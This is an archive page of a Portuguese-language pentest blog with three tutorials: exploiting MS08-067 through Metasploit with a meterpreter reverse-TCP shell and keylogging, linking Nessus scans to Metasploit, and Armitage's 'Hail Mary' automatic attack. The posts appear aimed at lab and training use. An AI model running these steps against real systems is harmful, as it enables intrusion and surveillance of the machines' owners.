Anúncios

Arquivo

Archive for novembro \28\UTC 2012

Explorando vulnerabilidades usando Metasploit Framework


Olá, na sequência de nosso último post gostaria de mostrar aqui a forma básica de se explorar uma vulnerabilidade, suponhamos o que sistema alvo tenha a vulnerabilidade MS 08-067 podemos usar localizar um exploit para ela usando o comando search exploits 08-067

Localizado o exploit vamos usá-lo para isso digite

use exploit/windows/smb/ms08_067_netapi

Depois show payloads para ver quais estão disponíveis daí faça a sequência de comandos

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [IP do BACKTRACK]

set RHOST [IP DO ALVO]

exploit

Feito isso agora é só explorar as possibilidades de exploração como screenshots, keyloggers e muitas outras opções no sistema comprometido.

Gostou? Compartilhe por favor.

Se sua empresa precisa de Suporte Técnico e Consultoria acesse: www.infrasecurity.com.br

 

Anúncios

Usando Nessus e Metasploit juntos


Olá a todos

Nessa dica gostaria de mostrar como usar o nessus juntamente com o Metasploit, fazer isso auxilia muito na hora de encontrar e explorar vulnerabilidades nos sistemas alvo.

Para usar você precisa ter o Nessus instalado e configurado para uso seja no backtrack ou em outra máquina.

Vai precisar também do Metaspoit Framework do Backtrack 5 R3

Abra o Metasploit e na console digite load nessus para carregar o plugin do nessus.

Para conectar à sua instalação do nessus digite nessus_connect msf:msf@127.0.0.1:8843 ok

Mude o local onde está msf:msf pelo seu login e senha de acesso ao sistema Nessus e se necessário caso o Nessus esteja em outra máquina que não seja o Backtrack mude 127.0.0.1 para o IP do computador que tem o Nessus instalado.

Digite nessus_policy_list para ver quais as polices disponíveis para fazer o scan. Numa instalação padrão vai aparecer 4 opções

1- Internal Network Scan

2- External Network Scan

3- Web App Tests

4- Prepare for PCI-DSS audits

Com essa informação em mãos vamos criar um novo scan para isso digite nessus_scan_new 1 WindowsXP 192.168.2.93

No comando acima substitua pelo número ID da police que deseja usar, para teste numa rede local pode usar 1 mesmo. Onde está escrito WindowsXP você pode colocar o nome que desejar para identificar a rotina e evidentemente você deve substituir o IP pelo do seu sistema alvo.

Digite nessus_scan_status para acompanhar o progresso até a conclusão quando acabar digite nessus_report_list e você vai poder visualizar o id e nome do Scan que acabou de ser realizado para analisar as vulnerabilidades encontradas digite nessus_report_vulns 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc

Substitua 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc pelo ID que vai ser exibido pra você quando executar o nessus_report_list

Para importar esse relatório para o Metasploit digite nessus_report_get 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc

Agora digite vulns e visualizará as vulnerabilidades encontradas.

Suponhamos, como exemplo, que tenha encontrado a Vulnerabilidade MS12-020 para localizar um exploit para ela digite search exploits 12-020

Daí é só ir explorando! No próximo post darei um exemplo de como explorar uma dessas vulnerabilidades.

Espero que tenham gostado e até a próxima.

Caso precise de Suporte e Consultoria acesse www.infrasecurity.com.br

Se gostou compartilhe!

Abraço

Tutorial: Usando o Armitage no Backtrack 5 para Pentest


Hoje gostaria de mostrar pra vocês alguns passos simples para usar o Armitage no Backtrack 5 R3

Como sabem essas informações devem ser usadas com responsabilidade.

O Armitage é uma ferramenta que auxilia no uso do Metasploit Framework, uma ferramenta bastante utilizada para fazer PenTest. Ela já vem instalada no Backtrack.

Nossa máquina alvo é um sistema Windows XP com Service Pack 3 Instalado, que está com o IP 192.168.2.93.

Você pode tentar com um sistema semelhante ou pode fazer o download dessa VM que é uma Máquina Virtual Linux intencionalmente com muitas vulnerabilidades que podem ser exploradas.

http://sourceforge.net/projects/metasploitable/

Vamos lá então

Abra o Armitage e o primeiro passo é adicionar a console nossa máquina alvo, para isso faça o seguinte:

Clique no menu Hosts e clique em Add Hosts

Digite o IP da máquina Alvo e clique Add

 

Na sequência vamos scanear o host por possíveis vulnerabilidades para isso clique com botão direito do mouse sobre o host que foi adicionado ao console e clique em “scan”

 

Aguarde a conclusão do scan que vai identificar as possíveis vulnerabilidades bem como o tipo de OS. Na sequência clique em “Attacks” e Depois em “Find Attacks”

 

Aguarde a conclusão da busca e na sequência de volta ao menu “Attacks” dessa vez selecione a opção “Hail Mary”, se você fizer tudo certo e o sistema alvo for vulnerável você verá uma mudança no ícone do Host semelhante a abaixo indicando que o sistema foi comprometido.

 

Agora é só ir explorando as possibilidades uma vez que o sistema foi comprometido.

Espero que tenham gostado da dica.

Se precisar de Consultoria para execução de um pentest acesse www.infrasecurity.com.br

Além disso lá você vai encontrar também outras opções de serviço como Suporte Técnico e Hospedagem.

Compartilhem.

Abraço